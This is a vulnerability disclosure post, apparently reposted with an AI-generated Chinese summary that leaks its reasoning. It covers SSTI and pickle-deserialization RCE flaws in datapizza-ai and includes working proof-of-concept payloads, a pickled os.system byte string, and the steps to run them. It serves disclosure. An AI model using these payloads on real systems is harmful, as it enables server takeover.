datapizza-ai, Yet Another Vulnerable AI Framework
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,而且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容,找出关键信息。 文章主要讲的是datapizza-ai框架中发现的两个远程代码执行漏洞:CVE-2026-2969和CVE-2026-2970。第一个漏洞是由于Jinja2模板引擎的不安全使用导致的SSTI,已经被修复。第二个漏洞涉及Redis缓存中的反序列化问题,仍然存在。 接下来,我需要将这些信息浓缩到100字以内。要确保涵盖两个漏洞的原因、影响以及处理情况。同时,避免使用像“文章总结”这样的开头语。 可能的结构是先介绍datapizza-ai框架,然后分别说明两个漏洞的情况。注意保持简洁明了,确保所有关键点都被涵盖。 最后,检查字数是否符合要求,并确保语言流畅自然。 </think> datapizza-ai框架存在两个远程代码执行漏洞:CVE-2026-2969(已修复)和CVE-2026-2970(未修复)。前者因Jinja2模板引擎不安全使用导致服务器端模板注入攻击;后者因Redis缓存中使用不安全反序列化函数引发命令执行风险。 2026-2-25 05:7:40 Author: www.hacktivesecurity.com(查看原文) 阅读量:1 收藏

TL;DR

Two Remote Code Execution (RCE) vulnerabilities were identified in datapizza-ai framework:

  • SSTI leading to RCE (CVE-2026-2969, fixed): Unsafe usage of Jinja2’s Template() allows Server-Side Template Injection (SSTI). If an attacker can control prompt templates, they can execute arbitrary system commands on the host.
  • Unsafe Deserialization leading to RCE (CVE-2026-2970, still present): The Redis cache implementation uses pickle.loads() on untrusted data. By poisoning the cache, an attacker can trigger arbitrary command execution when cached objects are deserialized.

What is datapizza-ai

Source here https://github.com/datapizza-labs/datapizza-ai.

CVE-2026-2969

The vulnerability is caused by the usage of vulnerable functions of Jinja2 template engine (datapizza-ai-core/datapizza/modules/prompt/prompt.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.2/datapizza-ai-core/datapizza/modules/prompt/prompt.py).

from jinja2 import Template
# ...
class ChatPromptTemplate(Prompt):
# ...
    def __init__(self, user_prompt_template, retrieval_prompt_template):
        self.user_prompt_template = Template(user_prompt_template)
        self.retrieval_prompt_template = Template(retrieval_prompt_template)
# ...
        # Add user's prompt
        formatted_user_prompt = self.user_prompt_template.render(
            user_prompt=user_prompt
        )
# ...
formatted_retrieval = self.retrieval_prompt_template.render(chunks=chunks)
# ...

To reproduce the exploit we have to install datapizza-ai:

python -m venv .env
source .env/bin/activate
pip install datapizza-ai==0.0.2

Create a python file with the following content:

import uuid

from datapizza.modules.prompt import ChatPromptTemplate
from datapizza.type import Chunk

# Create structured prompts for different tasks
system_prompt = ChatPromptTemplate(
    user_prompt_template="You are helping with data analysis tasks, this is the user prompt: " \
    "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned1')}}",
    retrieval_prompt_template="Retrieved " \
    "{{self.__init__.__globals__.__builtins__.__import__('os').popen('touch pwned2')}} " \
    "content:\n{% for chunk in chunks %}{{ chunk.text }}\n{% endfor %}"
)

print(
    system_prompt.format(
        user_prompt="Hello, how are you?", 
        chunks=[
            Chunk(id=str(uuid.uuid4()), text="This is a chunk"),
        Chunk(id=str(uuid.uuid4()), text="This is another chunk")
        ]
    )
)

Execute the file with python3 poc.py.

Command injection result (ls -alh):

total 28K
drwxrwxr-x  3 edoardottt edoardottt 4.0K Oct 14 12:31 .
drwxrwxr-x 13 edoardottt edoardottt 4.0K Oct 14 11:51 ..
-rw-rw-r--  1 edoardottt edoardottt  808 Oct 14 12:31 poc3-working.py
-rw-rw-r--  1 edoardottt edoardottt    0 Oct 14 12:30 pwned1
-rw-rw-r--  1 edoardottt edoardottt    0 Oct 14 12:30 pwned2
drwxrwxr-x  5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv

Usually if attackers can control the prompt templates they can subvert the model behavior.
In this case, attackers can run arbitrary system command without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is critical as the attacker can completely takeover the server host.
Here a simple Proof of Concept code snippet is shown, but in reality every feature that uses untrusted input in ChatPromptTemplate is vulnerable.

CVE-2026-2970

The vulnerability is caused by the usage of vulnerable functions of pickle serialization library (datapizza-ai-cache/redis/datapizza/cache/redis/cache.py, source here https://github.com/datapizza-labs/datapizza-ai/blob/v0.0.7/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).

import pickle
# ...
class RedisCache(Cache):
# ...
    def get(self, key: str) -> str | None:
        """Retrieve and deserialize object"""
        pickled_obj = self.redis.get(key)
        if pickled_obj is None:
            return None
        return pickle.loads(pickled_obj)  # type: ignore

    def set(self, key: str, obj):
        """Serialize and store object"""
        pickled_obj = pickle.dumps(obj)
        self.redis.set(key, pickled_obj, ex=self.expiration_time)

To reproduce the exploit we have to install datapizza-ai and the Redis cache module:

python -m venv .env
source .env/bin/activate
pip install datapizza-ai==0.0.7
pip install datapizza-ai-cache-redis

Spin up a Redis server (we’re using Docker for simplicity):

docker run -d --name redis -p 6379:6379 redis:latest

For a simple proof of concept we’re using the bytes representation of pickled object below:

class Evil:
    def __reduce__(self):
        return (os.system, ("touch cachepwned",))

that is: \x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94..

Poison the Redis cache with this value:

127.0.0.1:6379> set poc "\x80\x04\x95+\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x10touch cachepwned\x94\x85\x94R\x94."
OK

And run the python program below with python3 poc.py.
The following snippet just creates a new Redis cache object and tries to get the value of the key “poc” from Redis.

from datapizza.cache.redis import RedisCache

def test_redis_cache():
    cache = RedisCache(host="localhost", port=6379, db=0)
    cache.get("poc")

test_redis_cache()

Command injection result (ls -alh):

total 16K
-rw-rw-r-- 1 edoardottt edoardottt    0 Oct 15 18:57 cachepwned
-rw-rw-r-- 1 edoardottt edoardottt  312 Oct 15 18:51 poc-cache.py
drwxrwxr-x 5 edoardottt edoardottt 4.0K Oct 14 11:53 .venv/

Usually if attackers can control the redis cache they can subvert the model behavior, for example injecting fake LLM replies in cached queries.
In this case, attackers can run arbitrary system commands without any restriction (e.g. they could use a reverse shell and gain access to the server).
The impact is high as the attacker can completely takeover the server host.
Here a simple Proof of Concept code snippet is shown, but in reality every feature that uses RedisCache is potentially vulnerable.

Final Considerations

I want to share a couple of thoughts:

First: how is it possible that in 2026 we still have these types of vulnerabilities?
Nowadays, any developer should know that for every language there are libraries that could lead to very bad vulnerabilities such as Jinja2 and Pickle.

Second: It was a pain in the ass communicating with the vendor.
Emails (from me and a CNA), Discord messages and GitHub private security advisories have been used and still this was the process so far:

That’s it, no further communication. We didn’t receive replies to our messages and no public advisory or user notification was issued in accordance with responsible disclosure practices.

The Unsafe Deserialization it’s still present, no response from the vendor (https://github.com/datapizza-labs/datapizza-ai/blob/f3c5508acce857f6a454ca239aea7481f97ceb69/datapizza-ai-cache/redis/datapizza/cache/redis/cache.py).

How is it possible that in 2026 companies still fail to understand how basic security practices work and doesn’t care about their product (and users) security?

At first I wanted to use a lot of memes here (Datapizza uses a lot), but honestly there’s nothing to laugh about 😕.

References


文章来源: https://www.hacktivesecurity.com/blog/2026/02/25/datapizza-ai-yet-another-vulnerable-ai-framework/
如有侵权请联系:admin#unsafe.sh